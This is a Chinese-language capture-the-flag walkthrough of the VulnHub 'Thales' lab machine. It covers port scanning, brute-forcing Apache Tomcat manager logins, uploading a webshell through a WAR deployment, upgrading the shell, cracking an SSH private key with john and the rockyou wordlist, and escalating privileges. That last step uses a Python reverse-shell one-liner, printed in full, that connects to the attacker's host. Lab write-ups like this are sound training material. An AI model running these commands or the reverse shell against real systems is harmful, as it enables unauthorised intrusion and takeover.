VulnHub靶场Thales

靶场地址https://www.vulnhub.com/entry/thales-1,749/

配置：

kali虚拟机有两个网卡，一个是仅主机模式，一个是NAT模式，应为校园网原因不能使用桥接模式

靶机一个网卡仅主机模式

靶机发现

攻击机：192.168.56.104

靶机：192.168.56.108

信息收集

22/tcp ssh

8080/tcp http

Apache Tomcat 9.0.52

漏洞发现

从Tomcat 9.0.52入手

传递参数name:admin password:12356

简单的base64加密，放到爆破模块看看存不存在弱口令

base64编码

去掉这个勾，免得对我们的payload编码

开始爆破

要等好久，我就换了msf

跑了一遍没有出来，发现没有tomcat用户名，然后我就自己创建了个字典加进去，就出来了。

密码是role1

登陆进后台了

漏洞利用

可以部署war包

尝试了weevely工具生成木马上传，发现是404。

后来我用哥斯拉生成了一个木马，上传连接的时候，发现我傻B了，木马路径是war包名/文件名

OK连接成功

也可以利用msfvenom,后面直接反弹shell,更加稳定。

切换反弹shell

注意python版本

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

Ctrl+Z

stty -a

stty raw -echo;fg

reset

stty rows26 columns 126

提权

user.txt没有权限查看，应该是一个flag,有个ssh文件,下载id_rsa

通过ssh2john转换为可以识别的信息,破解密码

python3 /usr/share/john/ssh2john.py id_rsa >crack.txt

john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt

有个脚本文件，属主是root,可以用来提权

这个脚本代码是看大佬写的

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'